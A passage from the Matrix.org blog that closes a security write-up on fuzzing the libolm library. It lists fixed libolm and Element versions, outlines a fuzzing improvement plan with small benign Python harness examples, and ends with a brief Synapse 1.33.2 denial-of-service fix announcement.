On the other hand, due to typed calls and much stronger control-flow integrity techniques, it's much harder for the attacker to make the code do something that is (maliciously) useful. Notably, return addresses live outside unmanaged memory and are out of reach to the attacker. Because of this, the primary way of influencing code execution is by manipulating call_indirect instructions in such a way as to call.

The analysis of the impact of this bug on the WASM binary is thus left as an exercise to the reader. If you're interested, the 2020 USENIX paper Everything Old is New Again: Binary Security of WebAssembly is a great starting point.

The fix

Once the problems were identified, the patches were rather trivial and the issues were promptly resolved. The first libolm release that includes the fix is 3.2.3 which was released on 2021-05-25.

We reached out to all Matrix clients which were determined to be affected. The Element client versions which first fix the issue are as follows:

  • Element Web/Desktop: v1.7.29
  • Element Android: v1.1.9
  • Element iOS: v1.4.0

For the mobile clients, these versions are already available in their respective application stores at the time of publishing this post. If you haven't already, please upgrade.

Future work

Even though the fuzzing setup is in much better shape now (or rather will be, since I still have some PRs to merge upstream), there's still a lot that can be done to further improve it.

Right now, there are undoubtedly parts of the codebase that are not fuzzed well. The reasons for this range from the obvious, like some parts of the code simply not being called by any of the existing harnesses, to more subtle ones such as the fact that cryptographic operations form a nearly insurmountable natural barrier for naive fuzzing operations (see footnote 3). Finally, some of the existing harnesses accept additional parameters as command-line arguments, meaning we would have to re-run the same harness with different values of those parameters in order to reach full coverage of the code. This is suboptimal.

So the plan for future work is roughly as follows:

  1. Write missing harnesses to cover more portions of the codebase.
  2. Write starting corpus generators. These should generate believable, valid input for each of the harnesses. For example, for the decryption harness, we should generate a variety of encrypted messages: empty, short, long, text, binary, etc.
  3. Modify the harnesses so that their extra parameters are determined from the fuzzed input. This will allow the fuzzer to vary these itself, which reduces the importance of the human in the loop and makes it harder to forget some combination.
  4. Fuzz for some time until coverage stops increasing. The corpora generated should be saved so that future fuzzing attempts can resume from an earlier point and this work is not wasted.
  5. Use afl-cov to investigate which parts of the code are not covered well or at all. This should inform us what further changes are needed.
  6. Write intelligent, custom mutators. These will allow the fuzzer to take a valid input and easily produce another valid input instead of only corrupting it with a high probability.
  7. Design harnesses which test for wanted semantic properties instead of only memory errors.
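
Items 3 and 7 of the plan can be sketched together in a few lines of Python. This is a hypothetical illustration only: the real harnesses are native programs driven by AFL++, and here a base64 codec stands in for the library function under test. The names `MODES`, `split_fuzz_input`, `encode`, `decode` and `harness` are invented for the example.

```python
import base64

MODES = ("padded", "unpadded")  # hypothetical harness parameter


def split_fuzz_input(data: bytes):
    """Derive the harness parameter from the first input byte;
    the remaining bytes are the payload."""
    if not data:
        return MODES[0], b""
    return MODES[data[0] % len(MODES)], data[1:]


def encode(payload: bytes, mode: str) -> bytes:
    """Base64-encode, optionally stripping the trailing padding."""
    encoded = base64.b64encode(payload)
    return encoded if mode == "padded" else encoded.rstrip(b"=")


def decode(encoded: bytes) -> bytes:
    """Restore any stripped padding, then decode."""
    return base64.b64decode(encoded + b"=" * (-len(encoded) % 4))


def harness(data: bytes) -> None:
    """Check a semantic property (round-trip) rather than only crashes."""
    mode, payload = split_fuzz_input(data)
    assert decode(encode(payload, mode)) == payload
```

Because the mode is taken from the input itself, the fuzzer explores both variants on its own, and the round-trip assertion turns a silent logic error into a crash the fuzzer can report.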

It's very exciting that we're able to do full-time security research on Matrix these days (thanks to Element's funding), and going forwards we'll publish any interesting discoveries for the visibility and education of the whole Matrix community. We'd also like to remind everyone that we run an official Security Disclosure Policy for Matrix.org and we'd welcome other researchers to come join our Hall of Fame! (And hopefully we will get more bounty programmes running in future.)


  1. In the context of fuzzing, collisions are situations where two different execution paths appear to the fuzzer as the same one due to technical limitations. Classically, AFL tracks coverage by tracking so-called "edges" (or "tuples"). Edges are really pairs of (A, B), where A and B represent basic blocks. Each edge is meant to represent a different execution "jump", but sometimes, as the number of basic blocks in a program grows, two different execution paths can end up being encoded as the same edge. LTO mode in AFL++ does some magic so that this is guaranteed not to happen.
  2. By remainder byte, I mean bytes which are not part of a group of 4. These can only occur at the end of a base64 payload and they're the ones that get suffixed with padding in padded base64.
  3. Classic fuzzers famously have a hard time circumventing magic values and checksums, and cryptography is full of these. This is further complicated by the fact that the double ratchet algorithm is very stateful and depends on the two ratchets evolving in lockstep. This means that even if, for example, the decryption harness is supplied with a corpus of valid encrypted messages, the mutations done by the fuzzer would only manage to produce corrupted versions of those messages which will fail to decrypt, but it will ~never manage to produce a different valid encrypted message.
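
The edge collisions described in footnote 1 can be reproduced with a small sketch of the classic AFL bookkeeping, in which each basic block gets a random ID, the previous block's ID is shifted right by one, and the result is XORed with the current block's ID to index a 64 KiB map. The block IDs below are hand-picked for the demonstration, and `edge_index` is a name made up for this example.

```python
MAP_SIZE = 1 << 16  # classic AFL default: 64 KiB coverage map


def edge_index(prev_block: int, cur_block: int) -> int:
    """Map slot for the edge prev_block -> cur_block.

    Shifting the previous ID keeps A -> B distinct from B -> A,
    but two unrelated edges can still land in the same slot.
    """
    return ((prev_block >> 1) ^ cur_block) % MAP_SIZE


# Direction is preserved: 2 -> 5 and 5 -> 2 use different slots.
forward = edge_index(2, 5)
backward = edge_index(5, 2)

# A collision: the unrelated edge 8 -> 0 shares a slot with 2 -> 5.
other = edge_index(8, 0)
```

When two edges share a slot, the fuzzer cannot tell them apart, so reaching the second one does not register as new coverage.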

Synapse 1.33.2 released

2021-05-11 — Releases, Security — Dan Callahan

Synapse 1.33.2 is now available.

This release fixes a denial of service issue (CVE-2021-29471) where evaluating specially crafted push rules could lead to excessive CPU load. Server administrators are encouraged to upgrade.

To learn more about Synapse 1.33, see last week's release announcement.
